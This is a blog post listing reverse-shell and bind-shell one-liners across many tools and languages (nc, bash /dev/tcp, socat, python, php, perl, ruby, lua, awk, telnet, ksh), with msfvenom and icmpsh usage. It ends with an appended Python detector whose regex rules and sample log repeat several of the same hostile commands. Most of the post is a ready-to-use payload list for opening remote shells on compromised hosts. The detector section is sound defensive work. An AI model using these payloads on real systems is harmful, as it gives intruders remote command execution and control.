Cross-boundary transfer: reverse shells

Reverse shells
     1. nc
         Forward (bind) connection
             Attacker
                 nc -vv <victim ip> <victim port>
             Victim
                 nc -lvvp <victim port> -e /bin/bash
         Reverse connection
             Attacker
                 nc -lvvp <attacker port>
             Victim
                 nc -vv <attacker ip> <attacker port> -e /bin/bash
         Chat / file transfer
             Sender
                 nc -lvvp <own port> < file
             Receiver
                 nc -vv <sender ip> <sender port> > file
     2. bash
         Receiver (hackip, public address)
             nc -lvvp <port>
         Sender (victim)
             bash -i >& /dev/tcp/hackip/hackport 0>&1
             0<&31-;exec 31<>/dev/tcp/hackip/hackport;sh <&31 >&31 2>&31
     3. socat
         TCP reverse shell
             Receiver (attacker)
                 socat TCP-LISTEN:<port> -
             Sender (target)
                 linux
                     socat exec:'bash -i',pty,stderr,setsid,sigint,sane tcp:<attacker ip>:<attacker port>
                 windows
                     socat.exe exec:'cmd.exe',pty,stderr,setsid,sigint,sane tcp:<attacker ip>:<attacker port>
         UDP reverse shell
             Receiver (attacker)
                 socat udp-listen:<port> -
             Sender (target)
                 linux
                     socat udp-connect:<ip>:<port> exec:'bash -i',pty,stderr,sane 2>&1>/dev/null &
                 windows
                     socat.exe udp-connect:192.168.5.108:30000 exec:'cmd.exe',pty,stderr,sane
     4. python
         Receiver (attacker)
             nc -lvvp <port>
         Sender (target)
             python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<receiver ip>",<receiver port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
     5. php
         Receiver (attacker)
             nc -lvvp <port>
         Sender (target)
             php -r '$sock=fsockopen("<receiver ip>",<receiver port>);exec("/bin/sh -i <&3 >&3 2>&3");'
     6. Java (Groovy syntax)
         Receiver (attacker)
             nc -lvvp <port>
         Sender (target)
             r = Runtime.getRuntime()
             p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.31.41/8080;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
             p.waitFor()
     7. perl
         Receiver (attacker)
             nc -lvvp <port>
         Sender (target)
             perl -e 'use Socket;$i="<ip>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
     8. ruby
         Receiver (attacker)
             nc -lvvp <port>
         Sender (target)
             ruby -r socket -e 'exit if fork;c=TCPSocket.new("<ip>","<port>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
     9. telnet
         Receiver (attacker)
             nc -lvvp <port>
         Sender (target)
             mknod backpipe p && telnet <ip> <port> 0<backpipe | /bin/bash 1>backpipe
     10. lua
         Receiver (attacker)
             nc -lvvp <port>
         Sender (target)
             lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('<ip>',<port>);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"
     11. awk
         Receiver (attacker)
             nc -lvvp <port>
         Sender (target)
             awk 'BEGIN{s="/inet/tcp/0/<ip>/<port>";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'
     12. ksh/tsh/zsh/sh
         Receiver (attacker)
             nc -lvvp <port>
         Sender (target)
             ksh -c 'ksh >/dev/tcp/<ip>/<port> 2>&1 <&1'
     13. Generating a reverse-shell payload with msfvenom
         1. msfvenom -l payloads | grep <tool>
         2. msfvenom -p <payload> LHOST=<listener IP> LPORT=<listener port>
     14. icmpsh
         Receiver
             ./icmpsh-m.py
         Sender
             icmpsh.exe -t <receiver ip>
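The one-liners above share a few command-line markers (nc with -e, /dev/tcp/, socat exec:, python socket plus dup2, the mknod/telnet backpipe, awk's /inet/tcp/, php fsockopen). As an added defender-side example that is not part of the original post, the following Python scans process-execution log lines for those markers; the rule set, the log format and every address are constructed assumptions for illustration.

```python
from __future__ import annotations
import re

# Indicator patterns for the reverse-shell techniques listed above
# (rule name -> regex over a process command line). Assumed rule set for this example.
RULES = {
    "nc-exec": re.compile(r"\bnc(?:at)?\b.*\s-e\s*/bin/(?:ba)?sh"),
    "bash-dev-tcp": re.compile(r"/dev/(?:tcp|udp)/[\w.\-]+/\d+"),
    "socat-exec": re.compile(r"\bsocat(?:\.exe)?\b.*\bexec:"),
    "python-dup2": re.compile(r"\bpython\d?\b.*socket.*dup2"),
    "php-fsockopen": re.compile(r"\bphp\b.*fsockopen\("),
    "telnet-backpipe": re.compile(r"\bmknod\b.*\bp\b.*\btelnet\b"),
    "awk-inet-tcp": re.compile(r"\bawk\b.*/inet/tcp/"),
    "perl-socket-exec": re.compile(r"\bperl\b.*Socket.*exec\("),
    "ruby-tcpsocket": re.compile(r"\bruby\b.*TCPSocket.*popen"),
    "lua-socket-popen": re.compile(r"\blua\b.*require\('socket'\).*popen"),
}


def classify(cmdline: str) -> list[str]:
    """Return the names of every rule the command line matches (empty list if benign)."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


# Constructed sample process-exec log, one line per process: "<pid> <user> <cmdline>".
# Addresses are documentation ranges; lines 4103 and 4107 are benign and must not match.
SAMPLE_LOG = """\
4101 www-data bash -i >& /dev/tcp/203.0.113.5/4444 0>&1
4102 www-data nc -vv 203.0.113.5 4444 -e /bin/bash
4103 backup   nc -lvvp 9000 < backup.tar
4104 www-data python -c import socket,subprocess,os;s=socket.socket();s.connect(("203.0.113.5",4444));os.dup2(s.fileno(),0)
4105 root     socat TCP-LISTEN:8443,fork exec:'bash -i',pty
4106 www-data mknod backpipe p && telnet 203.0.113.5 4444 0<backpipe | /bin/bash 1>backpipe
4107 alice    ssh -L 8080:localhost:80 bastion
"""


def scan(log: str) -> list[tuple[str, str, list[str]]]:
    """Return (pid, user, matched rules) for every log line that trips at least one rule."""
    hits = []
    for line in log.splitlines():
        pid, user, cmdline = line.split(maxsplit=2)
        rules = classify(cmdline)
        if rules:
            hits.append((pid, user, rules))
    return hits


if __name__ == "__main__":
    for pid, user, rules in scan(SAMPLE_LOG):
        print(f"pid={pid} user={user} rules={','.join(rules)}")
```

The file-transfer use of nc (line 4103) does not trip the nc rule because it lacks -e; a deployment would pair these patterns with the parent process (web server or database spawning a shell) to cut false positives.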

posted @ 2020-03-02 02:51  simon7s  reads(566)  comments(0)